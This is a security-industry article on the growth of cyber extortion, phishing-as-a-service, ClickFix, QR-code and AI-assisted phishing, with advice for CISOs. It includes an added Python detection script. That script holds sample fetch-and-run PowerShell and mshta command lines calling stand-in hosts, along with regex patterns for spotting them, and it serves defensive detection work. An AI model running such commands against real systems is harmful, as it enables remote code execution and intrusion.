Inside the Cyber Extortion Boom: Phishing Gangs and Crime-as-a-Service Trends

During 2025, cyber extortion continued to grow, driven by more active phishing gangs, and increasingly sophisticated attacks.

According to the Security Navigator report from Orange Cyberdefense, the number of cyber extortion victims grew by 45% between October 2024 and September 2025.

The number of attacks, especially those which deploy ransomware, is being driven by the growth in cybercrime-as-a-service. Orange said that the number of distinct cybercrime groups has tripled since 2020.

Phishing attempts are growing in volume partly because organized crime groups no longer need technical knowledge to launch ransomware or other forms of cyber extortion: they can simply buy in the services they need.

This ongoing trend is combined with emerging social engineering techniques, including multi-channel attacks, deepfakes and ClickFix exploits.

Cybercriminals are also using AI to fine-tune their operations, with more persuasive personalization, better translation into other languages and easier reconnaissance against high-value targets. It is becoming harder to detect and block attacks, and harder to train workforces to spot suspicious activity.

“If you look at the UK's own data, phishing is still the main way British organizations are being compromised, but the tactics continue to evolve,” warned Rik Ferguson, VP Security Intelligence at Forescout.

“The government's Cyber Security Breaches Survey 2025 shows phishing remains the most common attack type. What changed in 2025 is less that phishing works, and more how it works.”

According to Ferguson, phishing is now as much of an infrastructure problem as a “content” problem. Forescout’s Vedere Labs pointed to how attackers are using Telegram bots, link forwarding services and front-end hosting to scale up phishing campaigns.

Researchers also point to threat actors using domains, including typosquatted domains and decommissioned infrastructure, to spread malware.

From OAuth Exploits to QR Code Malware: Technical Threats Poised to Grow in 2026

Authorized-app and token-hopping attacks abuse OAuth permissions and app consents to obtain refresh tokens across Microsoft 365, SaaS applications and other infrastructure, such as Slack. These allow attackers to maintain access and move laterally between applications, even after password resets. Researchers expect these attacks to grow in 2026.

ClickFix prompts users to visit fake update or error pages, then run malicious PowerShell or terminal commands. In this case, the attacker convinces the end user to act in a way that bypasses conventional controls.

ClickFix attacks alone grew five-fold in the first half of 2025, according to security researchers at ESET.
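A detection check that fits the ClickFix pattern described above, added here as an example and not taken from the article or any vendor it quotes: it scores constructed process-creation events for a script interpreter launched from the user's shell (explorer.exe) whose command line carries the hidden-window, encoded-command or fetch-and-run traits a pasted "fix" typically has. The field layout, sample values and hostnames are assumptions.

```python
import re

# Constructed process-creation events (assumed layout; map Sysmon Event ID 1 or
# your EDR's parent/image/command-line fields onto these keys).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://example.invalid/fix.ps1 | iex"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/verify.hta"},
    {"parent": r"C:\Program Files\Example\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NonInteractive -File C:\\scripts\\inventory.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c dir"},
]

# A pasted command runs as a child of the interactive shell, not of a service or
# management agent, so the parent is the first filter.
USER_SHELL_PARENTS = ("explorer.exe",)
INTERPRETERS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe")

# Traits of a pasted "fix": hide the window, pass an encoded/inline command,
# or fetch a remote script and pipe it straight into the interpreter.
SUSPICIOUS = [
    re.compile(r"-(w|win|windowstyle)\s+hidden", re.I),
    re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I),
    re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl)\b.*\|\s*iex", re.I),
    re.compile(r"^mshta(\.exe)?\s+https?://", re.I),
]


def score_event(event: dict) -> list[str]:
    """Return the patterns that fired for one event; an empty list means benign."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    if image not in INTERPRETERS or parent not in USER_SHELL_PARENTS:
        return []
    return [p.pattern for p in SUSPICIOUS if p.search(event["cmdline"])]


def triage(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and reasons for every event that looks like a ClickFix execution."""
    return [(i, hits) for i, e in enumerate(events) if (hits := score_event(e))]


if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['cmdline']!r} -> {reasons}")
```

The same interpreter with the same flags launched by a management agent (event 2) is left alone, which keeps the rule from firing on legitimate scripted administration.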

Other emerging attacks exploit QR codes. According to Rafe Pilling, director of threat intelligence at Sophos, phishing groups are again using QR codes to distribute malicious payloads, as they bypass users’ increased caution about clicking unfamiliar links.

“QR codes and adversary-in-the-middle phishing has become the trend for getting useful credentials and authenticated session tokens out of organizations,” Pilling said.

Security researchers have also observed an increase in phishing spread via .ics calendar files, either through malicious links, or code embedded in the ICS file itself. The invitations might also prompt the user to call a WhatsApp number.

The Growing AI Threat

Perhaps the greatest threat comes from, or will come from, AI, which can be used to fine-tune existing malicious campaigns and create convincing deepfakes to manipulate users and bypass identity checks.

Already, phishing groups are using LLMs for tasks including crafting phishing emails, removing telltale grammar and syntax errors, and for translation into a wider range of languages. This enables cybercrime gangs to increase their geographical reach, for relatively little effort.

“AI has increased the accuracy of a lot of phishing emails. Everybody was familiar with phishing emails; you could spot them by the bad grammar and the poor formatting and stuff like that. Previously, a good attacker could create a good phishing email. All AI has done is allowed the attacker to generate good quality phishing emails at speed and at scale,” explained Richard Meeus, EMEA director of security strategy and technology at Akamai.

Alongside making phishing emails more convincing, AI is also being used for 'synthetic identity scams'. These scams, which often use deepfake tools, voice cloning and AI-generated imagery, are linked to CEO/CFO fraud and impersonation, and to fake job applications from foreign agents posing as remote workers.

Andrew Bud, CEO and founder at biometric security firm iProov, noted that while passkeys have been successful over the past year in cutting phishing attacks, fake identities could be used for passkey recovery.

AI is also being used to fine-tune, and speed up, more mundane phishing attacks.

“In 2026, we expect to see organized crime groups automate workflows and outsource more tasks using AI agents in their attacks, especially preparatory tasks like researching victims to target,” said Alex Holland, principal threat researcher at HP’s Security Lab. He also expects to see criminal hackers use AI, and especially large language models (LLMs), for more complex tasks, including vulnerability discovery.

“AI assistance will help threat actors to scale their operations, making campaigns more efficient by reducing the resources and skills attackers need to breach targets,” he said.

How CISOs Can Tackle Phishing and Extortion Trends

For CISOs and wider cybersecurity and fraud prevention teams, recent developments in phishing and cyber extortion schemes will pose real challenges in the coming year.

“User awareness still matters, but it isn’t enough,” cautioned Forescout’s Ferguson. “In a world of deepfake video, cloned voices and perfect written English, your control point can’t be ‘would our users spot this?’”

He recommended that businesses build out-of-band verification into high-risk workflows and add elevated levels of security to channels such as SMS, collaboration tools and helpdesk chats.

At Sophos, Pilling recommended tightening up MFA processes to reduce the risk of adversary-in-the-middle phishing.

For CISOs, the priority is to harden networks and reduce the scope for attackers to move laterally across the organization and make it harder for cybercriminals to take over accounts and forge identities.

The approach must go hand in hand with maintaining basic cyber hygiene and security awareness across the business.

Tried and tested, low-technology attacks, including basic email phishing, continue to pose a risk. This looks set to remain the case even as malicious actors move to ever more sophisticated ways to breach defenses.
